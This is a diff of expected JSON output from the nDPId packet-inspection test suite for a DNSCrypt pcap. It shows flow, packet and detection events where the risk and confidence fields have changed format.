 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEVAAH4RqpAKAAABkFtq49QhAbsCCL4UZloBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54305,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEZAAH4Rqo8KAAABkFtq49itAbsCCL4UZlwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEcgAH4Rxs4KAAABkFtq49O8AbsGBCzXZl0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":54204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":505,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEcAuX4R66EKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":505,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":2,"flow_last_seen":946739396069,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739396069,"pkt":"ZmZmZmZmRERERERECABFAADTkQZAADcR9hiQW2rjCgAAAQG7oJQAvzbjZluBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAALkTa3PmYOnbKVsenPA+dUbqb7bPdeethm+r51VaewMcP0sfe1RtTAHcc8Uvs8bFQylZgA4Na3Yk4xgl2KWmKw4bPctGhBgarq2J2ya3ifLfvYsxbqqez8iaBEin48TCXxs9y0aEGBquAAAAAV9TgfdfVNN3"}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAIcSFhAAH4R+qEKAAABLuPIN4INIPsCCLnwFdMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFkgAH4RFuEKAAABLuPIN5ViIPsGBDRUFdABAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":38242,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396070,"flow_last_seen":946739396070,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396070,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":946739396070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396070,"pkt":"REREREREZmZmZmZmCABFAAXcSFogAH4RFuAKAAABLuPIN4HeIPsGBEfaFc4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA